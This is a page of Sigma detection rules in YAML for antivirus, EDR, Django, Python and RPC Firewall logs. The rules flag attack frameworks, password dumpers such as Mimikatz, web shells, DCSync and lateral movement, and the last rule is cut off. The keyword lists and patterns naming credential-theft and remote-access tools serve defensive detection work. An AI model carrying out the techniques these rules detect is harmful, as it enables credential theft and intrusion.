SigmaHQ/sigma/rules

application

antivirus

Antivirus Exploitation Framework Detection

```yaml
title: Antivirus Exploitation Framework Detection
id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
status: test
description: Detects a highly relevant Antivirus alert that reports an exploitation framework
author: Florian Roth
references:
    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
date: 2018/09/09
modified: 2021/11/27
logsource:
    product: antivirus
detection:
    selection:
        Signature|contains:
            - 'MeteTool'
            - 'MPreter'
            - 'Meterpreter'
            - 'Metasploit'
            - 'PowerSploit'
            - 'CobaltStrike'
            - 'Swrort'
            - 'Rozena'
            - 'Backdoor.Cobalt'
            - 'CobaltStr'
            - 'COBEACON'
            - 'Cometer'
            - 'Razy'
    condition: selection
fields:
    - FileName
    - User
falsepositives:
    - Unlikely
level: critical
tags:
    - attack.execution
    - attack.t1203
    - attack.command_and_control
    - attack.t1219
```

Antivirus Hacktool Detection

```yaml
title: Antivirus Hacktool Detection
id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba
description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool
status: experimental
date: 2021/08/16
author: Florian Roth
references:
    - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
logsource:
    product: antivirus
detection:
    selection:
        - Signature|startswith:
            - 'HTOOL'
            - 'HKTL'
            - 'SecurityTool'
            - 'ATK/' # Sophos
        - Signature|contains:
            - 'Hacktool'
    condition: selection
fields:
    - FileName
    - User
falsepositives:
    - Unlikely
level: high
tags:
    - attack.execution
    - attack.t1204
```

Antivirus Password Dumper Detection

```yaml
title: Antivirus Password Dumper Detection
id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
status: test
description: Detects a highly relevant Antivirus alert that reports a password dumper
author: Florian Roth
references:
    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
    - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection
date: 2018/09/09
modified: 2021/11/27
logsource:
    product: antivirus
detection:
    selection:
        Signature|contains:
            - 'DumpCreds'
            - 'Mimikatz'
            - 'PWCrack'
            - 'HTool/WCE'
            - 'PSWtool'
            - 'PWDump'
            - 'SecurityTool'
            - 'PShlSpy'
            - 'Rubeus'
            - 'Kekeo'
            - 'LsassDump'
            - 'Outflank'
    condition: selection
fields:
    - FileName
    - User
falsepositives:
    - Unlikely
level: critical
tags:
    - attack.credential_access
    - attack.t1003
    - attack.t1558
    - attack.t1003.001
    - attack.t1003.002
```

Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection

```yaml
title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561
status: stable
description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675.
references:
    - https://twitter.com/mvelazco/status/1410291741241102338
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
author: Sittikorn S, Nuttakorn T
date: 2021/07/01
modified: 2021/11/23
tags:
    - attack.privilege_escalation
    - attack.t1055
logsource:
    product: antivirus
detection:
    selection:
        Filename|contains: 'C:\Windows\System32\spool\drivers\x64\'
    condition: selection
fields:
    - Signature
    - Filename
    - ComputerName
falsepositives:
    - Unlikely
level: critical
```

Antivirus Relevant File Paths Alerts

```yaml
title: Antivirus Relevant File Paths Alerts
id: c9a88268-0047-4824-ba6e-4d81ce0b907c
description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
status: experimental
date: 2018/09/09
modified: 2021/11/23
author: Florian Roth, Arnim Rupp
references:
    - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/
logsource:
    product: antivirus
detection:
    selection:
        - Filename|startswith:
            - 'C:\Windows\'
            - 'C:\Temp\'
            - 'C:\PerfLogs\'
            - 'C:\Users\Public\'
            - 'C:\Users\Default\'
        - Filename|contains:
            - '\Client\'
            - '\tsclient\'
            - '\inetpub\'
            - '/www/'
            - 'apache'
            - 'tomcat'
            - 'nginx'
            - 'weblogic'
    selection2:
        Filename|endswith:
            - '.ps1'
            - '.psm1'
            - '.vbs'
            - '.bat'
            - '.cmd'
            - '.sh'
            - '.chm'
            - '.xml'
            - '.txt'
            - '.jsp'
            - '.jspx'
            - '.asp'
            - '.aspx'
            - '.ashx'
            - '.asax'
            - '.asmx'
            - '.php'
            - '.cfm'
            - '.py'
            - '.pyc'
            - '.pl'
            - '.rb'
            - '.cgi'
            - '.war'
            - '.ear'
            - '.hta'
            - '.lnk'
            - '.scf'
            - '.sct'
            - '.vbe'
            - '.wsf'
            - '.wsh'
            - '.gif'
            - '.png'
            - '.jpg'
            - '.jpeg'
            - '.svg'
            - '.dat'
    condition: selection or selection2
fields:
    - Signature
    - User
falsepositives:
    - Unlikely
level: high
tags:
    - attack.resource_development
    - attack.t1588
```

Antivirus Web Shell Detection

```yaml
title: Antivirus Web Shell Detection
id: fdf135a2-9241-4f96-a114-bb404948f736
description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a big webshell repo from e.g. GitHub and checking the matches.
status: experimental
date: 2018/09/09
modified: 2021/05/08
author: Florian Roth, Arnim Rupp
references:
    - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/
    - https://github.com/tennc/webshell
    - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection
    - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection
    - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection
    - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection
    - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection
    - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
    - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: antivirus
detection:
    selection:
        - Signature|startswith:
            - 'PHP/'
            - 'JSP/'
            - 'ASP/'
            - 'Perl/'
            - 'PHP.'
            - 'JSP.'
            - 'ASP.'
            - 'Perl.'
            - 'VBS/Uxor' # looking for 'VBS/' would also find downloaders and droppers meant for desktops
            - 'IIS/BackDoor'
            - 'JAVA/Backdoor'
            - 'Troj/ASP'
            - 'Troj/PHP'
            - 'Troj/JSP'
        - Signature|contains:
            - 'Webshell'
            - 'Chopper'
            - 'SinoChoper'
            - 'ASPXSpy'
            - 'Aspdoor'
            - 'filebrowser'
            - 'PHP_'
            - 'JSP_'
            - 'ASP_' # looking for 'VBS_' would also find downloaders and droppers meant for desktops
            - 'PHP:'
            - 'JSP:'
            - 'ASP:'
            - 'Perl:'
            - 'PHPShell'
            - 'Trojan.PHP'
            - 'Trojan.ASP'
            - 'Trojan.JSP'
            - 'Trojan.VBS'
            - 'PHP?Agent'
            - 'ASP?Agent'
            - 'JSP?Agent'
            - 'VBS?Agent'
            - 'Backdoor?PHP'
            - 'Backdoor?JSP'
            - 'Backdoor?ASP'
            - 'Backdoor?VBS'
            - 'Backdoor?Java'
    condition: selection
fields:
    - FileName
    - User
falsepositives:
    - Unlikely
level: critical
```

django

Django Framework Exceptions

```yaml
title: Django Framework Exceptions
id: fd435618-981e-4a7c-81f8-f78ce480d616
status: stable
description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
author: Thomas Patzke
date: 2017/08/05
modified: 2020/09/01
references:
    - https://docs.djangoproject.com/en/1.11/ref/exceptions/
    - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
logsource:
    category: application
    product: django
detection:
    keywords:
        - SuspiciousOperation
        # Subclasses of SuspiciousOperation
        - DisallowedHost
        - DisallowedModelAdminLookup
        - DisallowedModelAdminToField
        - DisallowedRedirect
        - InvalidSessionKey
        - RequestDataTooBig
        - SuspiciousFileOperation
        - SuspiciousMultipartForm
        - SuspiciousSession
        - TooManyFieldsSent
        # Further security-related exceptions
        - PermissionDenied
    condition: keywords
falsepositives:
    - Application bugs
    - Penetration testing
level: medium
tags:
    - attack.initial_access
    - attack.t1190
```

edr/windows

EDR WMI Command Execution by Office Applications

```yaml
title: EDR WMI Command Execution by Office Applications
id: 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815
description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
references:
    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'
tags:
    - attack.t1204.002
    - attack.t1047
    - attack.t1218.010
    - attack.execution
    - attack.defense_evasion
status: experimental
date: 2021/08/23
modified: 2021/11/09
logsource:
    product: windows
    category: edr
detection:
    #useful_information: Add more office applications to the rule logic of choice
    selection1:
        EventLog: EDR
        EventType: WMIExecution
        WMIcommand|contains: 'Win32_Process\:\:Create'
    selection2:
        Image|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
    condition: selection1 and selection2
falsepositives:
    - Unknown
level: high
```

python

Python SQL Exceptions

```yaml
title: Python SQL Exceptions
id: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9
status: stable
description: Generic rule for SQL exceptions in Python according to PEP 249
author: Thomas Patzke
date: 2017/08/12
modified: 2020/09/01
references:
    - https://www.python.org/dev/peps/pep-0249/#exceptions
logsource:
    category: application
    product: python
detection:
    exceptions:
        - DataError
        - IntegrityError
        - ProgrammingError
        - OperationalError
    condition: exceptions
falsepositives:
    - Application bugs
    - Penetration testing
level: medium
tags:
    - attack.initial_access
    - attack.t1190
```

rpc_firewall

Remote Schedule Task Lateral Movement via ATSvc

```yaml
title: Remote Schedule Task Lateral Movement via ATSvc
id: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb
description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
references:
    - https://attack.mitre.org/techniques/T1053/
    - https://attack.mitre.org/tactics/TA0008/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
    - attack.t1053
    - attack.t1053.002
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
        OpNum:
            - 0
            - 1
    condition: selection
falsepositives:
    - unknown
level: high
```

Remote Schedule Task Recon via ATSvc

```yaml
title: Remote Schedule Task Recon via ATSvc
id: f177f2bc-5f3e-4453-b599-57eefce9a59c
description: Detects remote RPC calls to read information about scheduled tasks via ATSvc
references:
    - https://attack.mitre.org/tactics/TA0007/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
    filter:
        OpNum:
            - 0
            - 1
    condition: selection and not filter
falsepositives:
    - unknown
level: high
```

Possible DCSync Attack

```yaml
title: Possible DCSync Attack
id: 56fda488-113e-4ce9-8076-afc2457922c3
description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
references:
    - https://attack.mitre.org/techniques/T1033/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DRSR.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.t1033
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for "dangerous" opcodes (not 0,1 or 12) only from trusted IPs (DCs)'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2
    filter:
        OpNum:
            - 0
            - 1
            - 12
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
```

Remote Encrypting File System Abuse

```yaml
title: Remote Encrypting File System Abuse
id: 5f92fff9-82e2-48eb-8fc1-8b133556a551
description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
references:
    - https://attack.mitre.org/tactics/TA0008/
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-EFSR.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid:
            - df1941c5-fe89-4e79-bf10-463657acf44d
            - c681d488-d850-11d0-8c52-00c04fd90f7e
    condition: selection
falsepositives:
    - Legitimate usage of remote file encryption
level: high
```

Remote Event Log Recon

```yaml
title: Remote Event Log Recon
id: 2053961f-44c7-4a64-b62d-f6e72800af0d
description: Detects remote RPC calls to get event log information via EVEN or EVEN6
references:
    - https://attack.mitre.org/tactics/TA0007/
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid:
            - 82273fdc-e32a-18c3-3f78-827929dc23ea
            - f6beaff7-1e19-4fbb-9f8f-b89e2018337c
    condition: selection
falsepositives:
    - remote administrative tasks on Windows Events
level: high
```

Remote Schedule Task Lateral Movement via ITaskSchedulerService

```yaml
title: Remote Schedule Task Lateral Movement via ITaskSchedulerService
id: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d
description: Detects remote RPC calls to create or execute a scheduled task
references:
    - https://attack.mitre.org/techniques/T1053/
    - https://attack.mitre.org/tactics/TA0008/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
    - attack.t1053
    - attack.t1053.002
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
        OpNum:
            - 1
            - 3
            - 4
            - 10
            - 11
            - 12
            - 13
            - 14
            - 15
    condition: selection
falsepositives:
    - unknown
level: high
```

Remote Schedule Task Recon via ITaskSchedulerService

```yaml
title: Remote Schedule Task Recon via ITaskSchedulerService
id: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e
description: Detects remote RPC calls to read information about scheduled tasks
references:
    - https://attack.mitre.org/tactics/TA0007/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
    filter:
        OpNum:
            - 1
            - 3
            - 4
            - 10
            - 11
            - 12
            - 13
            - 14
            - 15
    condition: selection and not filter
falsepositives:
    - unknown
level: high
```

Remote Printing Abuse for Lateral Movement

```yaml
title: Remote Printing Abuse for Lateral Movement
id: bc3a4b0c-e167-48e1-aa88-b3020950e560
description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR
references:
    - https://attack.mitre.org/tactics/TA0008/
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RPRN-PAR.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid:
            - 12345678-1234-abcd-ef00-0123456789ab
            - 76f03f96-cdfd-44fc-a22c-64950a001209
            - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1
            - ae33069b-a2a8-46ee-a235-ddfd339be281
    condition: selection
falsepositives:
    - actual printing
level: high
```

Remote DCOM/WMI Lateral Movement

```yaml
title: Remote DCOM/WMI Lateral Movement
id: 68050b10-e477-4377-a99b-3721b422d6ef
description: Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
references:
    - https://attack.mitre.org/tactics/TA0008/
    - https://attack.mitre.org/techniques/T1021/003/
    - https://attack.mitre.org/techniques/T1047/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
    - attack.t1021.003
    - attack.t1047
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 or 99fcfec4-5260-101b-bbcb-00aa0021347a or 000001a0-0000-0000-c000-000000000046 or 00000131-0000-0000-c000-000000000046 or 00000143-0000-0000-c000-000000000046 or 00000000-0000-0000-c000-000000000046"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid:
            - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
            - 99fcfec4-5260-101b-bbcb-00aa0021347a
            - 000001a0-0000-0000-c000-000000000046
            - 00000131-0000-0000-c000-000000000046
            - 00000143-0000-0000-c000-000000000046
            - 00000000-0000-0000-c000-000000000046
    condition: selection
falsepositives:
    - Some administrative tasks on remote host
level: high
```

Remote Registry Lateral Movement

```yaml
title: Remote Registry Lateral Movement
id: 35c55673-84ca-4e99-8d09-e334f3c29539
description: Detects remote RPC calls to modify the registry and possibly execute code
references:
    - https://attack.mitre.org/techniques/T1112/
    - https://attack.mitre.org/tactics/TA0008/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
        OpNum:
            - 6
            - 7
            - 8
            - 13
            - 18
            - 19
            - 21
            - 22
            - 23
            - 35
    condition: selection
falsepositives:
    - Remote administration of registry values
level: high
```

Remote Registry Recon

```yaml
title: Remote Registry Recon
id: d8ffe17e-04be-4886-beb9-c1dd1944b9a8
description: Detects remote RPC calls to collect information
references:
    - https://attack.mitre.org/tactics/TA0007/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
    filter:
        OpNum:
            - 6
            - 7
            - 8
            - 13
            - 18
            - 19
            - 21
            - 22
            - 23
            - 35
    condition: selection and not filter
falsepositives:
    - Remote administration of registry values
level: high
```

Remote Server Service Abuse

```yaml
title: Remote Server Service Abuse
id: b6ea3cc7-542f-43ef-bbe4-980fbed444c7
description: Detects remote RPC calls to possibly abuse the remote server service via MS-SRVS
references:
    - https://attack.mitre.org/tactics/TA0008/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
    condition: selection
falsepositives:
    - Legitimate remote share creation
level: high
```

Remote Server Service Abuse for Lateral Movement

```yaml
title: Remote Server Service Abuse for Lateral Movement
id: 10018e73-06ec-46ec-8107-9172f1e04ff2
description: Detects remote RPC calls to possibly abuse the remote service control manager via MS-SCMR
references:
    - https://attack.mitre.org/tactics/TA0008/
    - https://attack.mitre.org/techniques/T1569/002/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SCMR.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
    - attack.t1569.002
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003
    condition: selection
falsepositives:
    - Administrative tasks on remote services
level: high
```

Remote Schedule Task Lateral Movement via SASec

```yaml
title: Remote Schedule Task Lateral Movement via SASec
id: aff229ab-f8cd-447b-b215-084d11e79eb0
description: Detects remote RPC calls to create or execute a scheduled task via SASec
references:
    - https://attack.mitre.org/techniques/T1053/
    - https://attack.mitre.org/tactics/TA0008/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
tags:
    - attack.lateral_movement
    - attack.t1053
    - attack.t1053.002
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
        OpNum:
            - 0
            - 1
    condition: selection
falsepositives:
    - unknown
level: high
```

Remote Schedule Task Recon via SASec

```yaml
title: Remote Schedule Task Recon via SASec
id: 0a3ff354-93fc-4273-8a03-1078782de5b7
description: Detects remote RPC calls to read information about scheduled tasks via SASec
references:
    - https://attack.mitre.org/tactics/TA0007/
    - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
    - https://github.com/zeronetworks/rpcfirewall
    - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
status: experimental
author: Sagie Dulce, Dekel Paz
date: 2022/01/01
modified: 2022/01/01
logsource:
    product: rpc_firewall
    category: application
    definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
detection:
    selection:
        EventLog: RPCFW
        EventID: 3
        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
    filter:
        OpNum:
            - 0
            - 1
    condition: selection and not filter
falsepositives:
    - unknown
level: high
```

SharpHound Recon Account Discovery

  1. title: SharpHound Recon Account Discovery
  2. id: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5
  3. description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.
  4. references:
  5. - https://attack.mitre.org/techniques/T1087/
  6. - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3
  7. - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-WKST.md
  8. - https://github.com/zeronetworks/rpcfirewall
  9. - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11. - attack.t1087
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17. product: rpc_firewall
  18. category: application
  19. definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2"'
  20. detection:
  21. selection:
  22. EventLog: RPCFW
  23. EventID: 3
